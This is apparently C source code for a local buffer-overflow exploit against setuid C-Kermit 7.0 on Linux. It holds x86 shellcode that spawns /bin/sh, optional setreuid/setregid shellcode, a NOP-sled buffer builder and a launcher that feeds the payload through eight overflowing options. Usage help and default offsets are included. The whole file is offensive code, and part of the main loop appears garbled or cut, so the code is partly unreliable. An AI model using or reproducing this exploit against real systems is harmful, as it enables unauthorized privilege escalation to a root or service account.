/* (linux)ckermit[v7.0] local overflow, by v9[v9@fakehalo.org]. the ckermit package is commonly installed setuid/setgid, mainly on bsd systems. but, same rules apply to linux. there are multiple overflows in this package, some of them need setre*id(); shellcode to obtain the id of the program. if you find you need the setre*id() asm/shellcode, simply uncomment one of the two commented lines in the exec[] array(not both) and select an id to use(usually uid=10 or gid=14 which is uucp). note: i pre-wrapped this so it wouldn't get wrapped where it wouldn't work. also, this isn't what i originally made this asm code for but, it applied here as well. */ #define PATH "/usr/local/bin/kermit" // path to the c-kermit. #define FILLER 0x78 // to fill in the alignment. #define DEFAULT_OFFSET 5000 // generic offset. #define DEFAULT_ALIGN 0 // generic alignment. #define DEFAULT_ID 10 // uid=uucp, generic. static char exec[]= // uncomment for setreuid(?,?); -- ? being the id value supplied. // "\x29\xc0\xb0\x46\x29\xdb\xb3\x00\x89\xd9\xcd\x80" // uncomment for setregid(?,?); -- ? being the id value supplied. // "\x29\xc0\xb0\x47\x29\xdb\xb3\x00\x89\xd9\xcd\x80" "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f\xb8\x1b\x56" "\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40\xcd\x80" "\xe8\xd7\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x01"; long pointer(void){__asm__("movl %esp,%eax");} int main(int argc,char **argv){ char eip[1050],final[1075],buf[4096],*typeset[8]={"dbfile","wtmpfile", "initfile","root","xferfile","userfile","helpfile","bannerfile"}; int i,offset,align,id,type; long ret; printf("[ (linux)ckermit[v7.0] local overflow, by: v9[v9@fakehalo.org]. ]\n"); if(!argv[1]||!strcmp(argv[1],"--help")){ printf( "::: (syntax): %s [offset] [alignment] [id].\n" "::: (type): 1:--dbfile : doesn't need setre*id asm. (o=5000 a=3)\n" "::: (type): 2:--wtmpfile : doesn't need setre*id asm. (o=5000 a=3)\n" "::: (type): 3:--initfile : doesn't need setre*id asm. (o=5000 a=3)\n" "::: (type): 4:--root : doesn't need setre*id asm. (o=5000 a=3)\n" "::: (type): 5:--xferfile : doesn't need setre*id asm. (o=5000 a=3)\n" "::: (type): 6:--userfile : doesn't need setre*id asm. (o=5000 a=3)\n" "::: (type): 7:--helpfile : does need setre*id asm. (o=5000 a=1)\n" "::: (type): 8:--bannerfile: does need setre*id asm. (o=5000 a=1)\n" "::: (required): argument alignment value must be: 0-3.\n" "::: (required): argument user/group id value must be: 1-255.\n" "::: (example): %s 1 5000 3\n",argv[0],argv[0]); exit(0); } else{ if(atoi(argv[1])<1||atoi(argv[1])>8){ printf("::: (error): invalid type: %d. (user 1-8)\n",atoi(argv[1])); exit(-1); } else{type=(atoi(argv[1])-1);} } if(argc>2){offset=atoi(argv[2]);} else{offset=DEFAULT_OFFSET;} if(argc>3){ if(atoi(argv[3])>3||atoi(argv[3])<0){ printf("::: (error): ignored argument alignment value: %s. (use 0-3)\n", argv[3]); align=DEFAULT_ALIGN; } else{align=atoi(argv[3]);} } else{align=DEFAULT_ALIGN;} if(argc>4){ if(atoi(argv[4])<1||atoi(argv[4])>255){ printf("::: (error): ignored argument uid/gid value: %s. (use 1-255)\n", argv[4]); id=DEFAULT_ID; } else{id=atoi(argv[4]);} } else{id=DEFAULT_ID;} ret=(pointer()+offset); for(i=0;ifinal): %d->%d, size(buf): %d[nops:%d].\n" "::: (data): using type %d(%s), parameter: --%s:.\n",ret,offset,align, id,strlen(eip),strlen(final),strlen(buf), (strlen(buf)-strlen((char *)strrchr(buf,0x90))+1),(type+1),typeset[type], typeset[type]); if(execlp(PATH,"kermit",final,0)){ printf("::: (error): could not execute: %s.\n",PATH); exit(-1); } }